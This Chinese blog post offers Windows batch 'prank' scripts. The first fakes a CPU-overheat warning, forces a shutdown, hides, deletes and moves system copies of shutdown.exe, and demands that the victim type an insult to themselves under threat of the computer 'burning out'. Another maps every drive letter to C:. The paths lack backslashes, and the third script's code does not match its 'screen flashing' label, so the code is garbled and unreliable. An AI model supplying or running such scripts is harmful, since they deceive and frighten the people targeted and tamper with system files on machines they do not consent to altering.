ฅ 烟 雨 吖!

一些恶搞用的bat批处理文件代码
1.不承认自己是蠢猪就断电 @echo off shutdown -s -t 40 -c "cpu高温预警 系...
扫描右侧二维码阅读全文
09
2017/09

一些恶搞用的bat批处理文件代码

1.不承认自己是蠢猪就断电

@echo off
shutdown -s -t 40 -c "cpu高温预警 系统准备关机"
attrib C:WINDOWSsystem32shutdown.exe -r -a -s -h
del C:WINDOWSsystem32dllcacheshutdown.exe
move C:WINDOWSsystem32shutdown.exe c:
echo. 要解除关机倒计时和恢复cpu正常电压请回答以下问题谢谢!
echo.
echo. 
echo. 
echo. 请直接输入
echo. "我是蠢猪"加回车键
echo. "或者"
echo. "我是小狗"加回车键
echo.
SET /p tt=
echo.
if /I "%tt%"=="我是蠢猪" goto 00
:55
echo.对不起 您的电脑 可能在下次启动时烧毁 对您带来的不便 我们深表歉意 具体后果我也不清楚
goto 55
:00
echo. 你是春准吗? "y"是 "n"不是
SET /p ff=
if /I "%ff%"=="y" (
copy c:shutdown.exe C:WINDOWSsystem32
shutdown -a
echo.
echo.
echo. "随便玩玩嘛 别生气哦 "


echo.
echo.
echo.
) else (
echo. 您设置的cpu工作电压过高 cpu存在危险!)
cmd.exe /k

2.出现大量磁盘

@echo off
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: C:)

恢复代码

@echo off
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: /d)

3.屏幕狂闪

@echo off
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: /d)
最后修改:2017 年 10 月 18 日 06 : 09 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论